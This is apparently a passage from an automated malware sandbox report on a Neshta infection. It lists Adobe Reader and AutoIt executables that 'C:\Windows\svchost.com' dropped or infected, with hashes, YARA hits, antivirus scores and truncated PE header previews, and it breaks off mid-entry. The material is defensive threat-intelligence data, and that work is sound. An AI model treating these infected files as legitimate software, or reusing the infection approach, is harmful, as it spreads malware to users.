                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5232250585402545
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                                                                                        MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                                                                                        SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                                                                                        SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                                                                                        SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.186107093668235
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                                                                                        MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                                                                                        SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                                                                                        SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                                                                                        SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.667436230875162
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                                                                                        MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                                                                                        SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                                                                                        SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                                                                                        SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461209967778202
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                                                                                        MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                                                                                        SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                                                                                        SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                                                                                        SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.302303877870808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                                                                                        MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                                                                                        SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                                                                                        SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                                                                                        SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.261294291615621
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                                                                                        MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                                                                                        SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                                                                                        SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                                                                                        SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.423139673646388
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                                                                                        MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                                                                                        SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                                                                                        SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                                                                                        SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.355719905315724
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                                                                                        MD5:A42467B5C21814776277B4CE3456D716
                                                                                                                        SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                                                                                        SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                                                                                        SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: Metadefender, Detection: 91%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.228109838185618
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                                                                                        MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                                                                                        SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                                                                                        SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                                                                                        SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.26326337462311
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                                                                                        MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                                                                                        SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                                                                                        SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                                                                                        SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.079745714518026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                                                                                        MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                                                                                        SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                                                                                        SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                                                                                        SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352749197508949
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                                                                                        MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                                                                                        SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                                                                                        SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                                                                                        SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.395396839059979
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                                                                                        MD5:B4E63C549366CFCDA2363E35C197D41C
                                                                                                                        SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                                                                                        SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                                                                                        SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.509452568334581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                                                                                        MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                                                                                        SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                                                                                        SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                                                                                        SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.476428579556002
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                                                                                        MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                                                                                        SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                                                                                        SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                                                                                        SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.520333669037674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                                                                                        MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                                                                                        SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                                                                                        SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                                                                                        SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.481287941039048
                                                                                                                        Encrypted:false
